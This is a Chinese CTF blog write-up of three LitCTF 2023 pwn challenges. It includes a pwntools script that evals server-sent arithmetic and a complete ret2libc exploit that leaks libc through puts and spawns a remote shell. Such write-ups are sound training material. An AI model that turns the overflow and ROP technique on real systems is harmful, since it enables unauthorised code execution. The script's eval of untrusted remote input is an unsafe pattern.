LitCTF PWN题解

最新推荐文章于 2024-07-29 14:37:54 发布
最新推荐文章于 2024-07-29 14:37:54 发布
阅读量545 收藏
点赞数
分类专栏: pwn 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ctfpwn/article/details/130997926
版权

1.[LitCTF 2023]只需要nc一下~

 直接nc之后ls查看一下目录,看到一个dockerfile,cat一下就能发现打开flag文件的方式

输入echo $flag拿到flag。

2.[LitCTF 2023]口算题卡

nc之后发现想让我们做100道100以内加减运算,直接口算就行了(雾)。

下面是脚本:

from pwn import*

s = lambda buf: io.send(buf)
sl = lambda buf: io.sendline(buf)
sa = lambda delim, buf: io.sendafter(delim, buf)
sal = lambda delim, buf: io.sendlineafter(delim, buf)
r = lambda n=None: io.recv(n)
ra = lambda t=tube.forever: io.recvall(t)
ru = lambda delim: io.recvuntil(delim)
rl = lambda: io.recvline()
rls = lambda n=2**20: io.recvlines(n)
su = lambda buf,addr: io.success(buf + "==>" + hex(addr))

io = remote("node4.anna.nssctf.cn",28789)
i = 0
while i<100:
    try:
       if i == 0:
           ru("n!\n")
           p = rl()
           equation = p[8:-2] 
           pay = eval(equation)
           print(equation)
           print(pay)
           sl(str(pay))
           i+=1
       else:
            ru("t!\n")
            p = rl()
            equation = p[8:-2] 
            pay = eval(equation)
            print(equation)
            print(pay)
            sl(str(pay))
            i+=1
    except Exception as e:
        print("Exception occurred:", e)
        break
io.interactive()
 

 运行效果:

 

 3.[LitCTF 2023]狠狠的溢出涅~

出题人你是懂的~

咳咳,接下来是正题。先把原件checksec一下:

然后放到ida里看看:

看看c伪代码,很容易看出是ret2libc题,并且对read读入的数据有一个strlen的判断,如果大于0x50就跳出。

strlen好办,只要在填充数据时在不超过0x50的地方加一个\x00绕过就OK了;

接下来就是正常的64位ret2libc过程,找一个pop寄存器和ret地址,用这条指令:ROPgadget --binary pwn --only 'pop|ret'

这里我们选用pop_rdi,然后构造rop链泄露puts函数的地址并返回main函数,构造如下:

payload1 = b"\x00".ljust(0x68,b'a') + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(0x4006B0)

 然后通过给的libc文件计算偏移,得到system函数和/bin/sh字符串的地址。

完整exp:

from pwn import *
from LibcSearcher import *

context.log_level = "debug"
io = remote('node5.anna.nssctf.cn',28128)
elf = ELF('./pwn4')
libc = ELF('./libc-2.31.so')
pop_rdi_ret = 0x4007d3 
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
ret_addr = 0x400556 

payload1 = b"\x00".ljust(0x68,b'a') + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(0x4006B0)

io.sendlineafter('message:\n',payload1)

#puts_addr = u64(io.recv(6).ljust(8,b"\x00"))
puts_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))

#libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.sym["puts"]
system = libc_base + libc.symbols['system']
binsh = libc_base+next(libc.search(b"/bin/sh\x00"))
#binsh = libc_base + libc.dump('str_bin_sh')
print(hex(system))
print(hex(binsh))
payload2 = b"\x00".ljust(0x68,b'a') + p64(ret_addr) + p64(pop_rdi_ret) +p64(binsh) + p64(system) #

io.sendlineafter('message:\n',payload2)
io.interactive()
 

 运行效果如下:

 拿到shell

 

 

rbp
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
LitCTF 2024 pwn AK
YX-hueimie
06-02 1395
探姬姐姐办的比赛,所以就打了一下。尽管是“新生赛”,但pwn方向并不是很新生,5道堆题+1道栈题,可能是出题的师傅比较少吧,应该是只有两位。我了解到这个比赛的时候已经要开赛了,投稿也来不及,要不然就投几道我的得意门生了。
CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1)
2401_84970145的博客
05-12 1080
CTF中PWN题型通常会直接给定一个已经编译好的二进制程序,然后参赛选手通过对二进制程序进行逆向分析和调试来找到利用漏洞,并编写利用代码发送playload,通过远程代码执行来达到攻击的效果,最终拿到目标机器的shell(控制台权限)来夺取flag。:常为C、C++及python写的一段程序,程序中往往包含着这样那样的漏洞。:利用反汇编等途径查看源代码并对程序进行理解的过程**调试:**程序调试是指通过分析和排查程序中的错误和问题,以找出程序运行过程中的错误和异常,并进行修复和优化的过程。
DozerCTF-PWN题解
2301_79696060的博客
04-28 835
这次比赛一共放了4道pwn题,3道栈上的,比较菜,只会做栈。
ISCC部分pwn题解
qq_46441427的博客
05-25 1861
菜的扣脚刚刚入门堆的辣鸡pwn手 M78 整型漏洞,那个262有点迷,感觉是263 flag{N@x_addr_*EnaBleD%} game 随机数的题,利用python脚本修改随机数种子 再写一个C脚本算随机数 成功拿到flag ISCC{this****&haobdvaljdnvoa0%bor} BOX 有libc,查看发现是libc2.27考虑tcache 写增删改查函数 泄露libc 计算malloc 最后劫持程序流 ISCC{angav**anva&77lnv
NewStarCTFWEEK2 pwn题解
m0_51251108的博客
09-27 709
NewStarCTFWEEK2uint32 and ret:shellcode-revenge:砍一刀:buffer-fly uint32 and ret: 就是个负数转无符号会变为一个很大的数,就能溢出,然后太大也不行read不了,找一下64位无符号int是多少,然后对应减掉一点,用gdb调试一下就知道了,还有就是用ret调一下 from pwn import * local_file = './uint' local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
2022NewStarCTF pwn大部分题解
m0_51251108的博客
11-18 1744
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn
”BUUCTF之pwn题解(一些栈题+程序分析)
热门推荐
swedsn
01-13 1万+
文章目录前言一、test_your_nc二、rip2.读入数据总结 前言 萌新的总结(包含当时做题的全过程),方便以后查看。有什么不对的望各位大佬指点。 一、test_your_nc 1.直接ncnc+的ip+端口号)。这里是直接进入了对方的shell命令中(有些题目是直接进入对方的文件并不会进入对方的shell中)。接下来就是和操作自己的shell一样的,ls查看目录,cat查看文件flag。 相互连接 二、rip 1使用IDA打开文件,先找main函数,然后按F5查看伪代码。看wp说fun可疑,点进
记一次bugku awd pwn题解4月19日
z1r0的博客
04-19 1353
记一次bugku awd pwn题解4月19日 在昨天还是前天的时候看到今天19:00有人开了一个awd房间,闲得没事就准备今天打着玩玩,结果前一个小时在玩忘记到了时间。。。。。 打开房间的时候发现时间已经过了一会了(XD 先连到端口看一下pwn的题目,很像个堆的题目,靶机上的libc是2.27-1.4的 看到保护什么都没有开的时候就猜到应该是写shellcode了。 这里可以内存泄露 这里可以通过buf来劫持heap_ptr这个指针。 接下来笔者还用到的一个地方就是这个释放功能 攻击思路: 因
PWN-题解
2301_79215333的博客
02-20 689
检查文件,64位,开启NX保护拖入IDA打开,查看主函数双击查看可以看到buf的长度只有0x80,即可用栈大小只有108字节,但是read()并没有限制输入,显然存在栈溢出漏洞。在Functions window可以看到有一个callsystem()函数,按F5反汇编可以看到这是一个系统调用,存在system(“/bin/sh”)即使用栈溢出令返回地址指向该函数地址即可。
记一次bugku pwn题解4月27日
z1r0的博客
04-27 515
记一次bugku pwn题解4月27日 emmmm,远程环境很垃圾(2.19-0ubuntu6.15),笔者patchelf的时候才想起来没有2.19,所以直接用2.23。利用realloc调整了好多次都打不通。。。。。换了四次gadget从0一直测试到realloc+0x30。。。。(没意思,其实可以利用其他方式,比如fsop,当时想着可能马上就可以通了就没有再高兴换了。。 uaf漏洞一枚,还可以edit,直接fastbin attack乱杀。快速写完初始exp发现了一个很ganga的事情,打不通本地和
快醒醒,别睡了!...讲《数据分析pandas库》了—/—<4>
qq_64603703的博客
07-27 947
详细解说数据分析pandas库中的常用方法
全网最详细Gradio教程系列5——Gradio Client: python
shao918516的博客
07-26 1044
程序部署完成后,如何将Gradio App作为API访问使用呢,这就用到Gradio Client。本章讲解Gradio Client的三种使用方式:python、javascript和curl,受字数限制,所以分三篇博客发布。 使用Gradio Python Client非常易于将Gradio应用程序作为API使用,本节讲述gradio_client安装、如何连接Gradio应用程序、查看可用API及其使用方式、job及session等用法。 通过Gradio Python Cli
全面解析 SnowNLP:中文文本处理、情感分析
有勇气的牛排博客
07-24 681
SnowNLP 是一个专门用于处理中文文本的 Python库。分词情感分析关键词提取文本分类拼音转换繁体转简体词相似度计算等测试环境:Python3.10.9尚未测出该功能text = "有勇气的牛排写的文章通俗易懂,爱了爱了"文本分类使用的是 SnowNLP 的情感分析模型。
Chapter 18 Python异常
2302_80253507的博客
07-28 1142
Python中,异常是一种特定的对象,能够在程序运行过程中被抛出和处理。有效地管理异常不仅可以增强程序的稳定性,还可以提高用户体验,使程序能够优雅地处理错误情况。本章详细讲解了异常的基本概念以及如何捕获和处理异常。
loguru日志模块:简化Python自动化测试的日志管理!
最新发布
07-29 646
日志是软件开发中的关键组成部分,为开发和测试人员提供了调试和监控应用程序的重要手段。loguru 是一个第三方的 Python 日志库,以其简洁的 API 和自动化的功能脱颖而出。本文将探讨为什么项目中需要日志,loguru 为何受到青睐,以及如何封装和在接口自动化测试项目中使用 loguru,同时结合 Allure 生成丰富的测试报告。
安卓手机部署大模型实战
奇舞周刊
07-25 966
本文作者系360奇舞团前端开发工程师前言自ChatGPT发布以来,大语言模型(Large language model, LLM)就成了AI乃至整个计算机科学的话题中心。学术界,工业界围绕大语言模型本身及其应用展开了广泛的讨论,大量的新的实践层出不穷。由于LLM对计算资源的需求极大,有能力部署大语言模型的公司和实验室一般通过搭建集群,然后开放API或者网页demo的方式让用户可以使用模型。在人们纷...
Python(C++)大尺度分层边值时变图统计推理并行算法
跨学科知识视角展现
07-29 564
:dart:分层结构制定生成模型 | :dart:贝叶斯模型选择程序 | :dart:分层结构图的信息性 | :dart:分层模型适应实值边协变量的网络 | :dart:分层模型适应时变网络,划分层对应于检测变化点 | :dart:定义两种版本随机块模型::pen:具有边缘协变量模型概率分布,分层图总似然 | :pen:独立分层模型分层图数学似然计算 | :dart:推理算法:大图形尺度并行计算算法,过滤暂时被遮蔽的节点和边
Python数据增强】图像数据集扩充
阿齐Archie
07-25 2079
该脚本用于图像数据增强,特别是目标检测任务中的图像和标签数据增强。通过应用一系列数据增强技术(如旋转、平移、裁剪、加噪声、改变亮度、cutout、翻转等),生成多样化的图像数据集,以提高目标检测模型的鲁棒性和准确性。
2023 羊城杯 pwn
01-02
2023年的羊城杯pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城杯吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出扎实的漏洞利用能力和对各种漏洞类型的深刻理解。 在比赛中,选手们将不仅需要迅速理解并攻克给定的目标程序,还要在极短的时间内快速编写出最有效的漏洞利用代码。比赛中还可能涉及到逆向工程和加密算法的挑战,综合了对系统原理和网络安全的深入理解。 对于参赛选手来说,需要具备丰富的经验和深厚的技术功底,以应对各种复杂多变的攻击场景。他们需要灵活运用各种pwn技术和工具,快速定位和利用漏洞,最大限度地获取目标系统的控制权。 羊城杯pwn比赛将成为一次全球顶尖网络安全专家的盛会,也将极大地推动网络安全技术的发展和创新。这场比赛将不仅展现出各选手的技术实力,也将促进国际网络安全领域的交流与合作,为推动网络安全事业的发展贡献力量。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值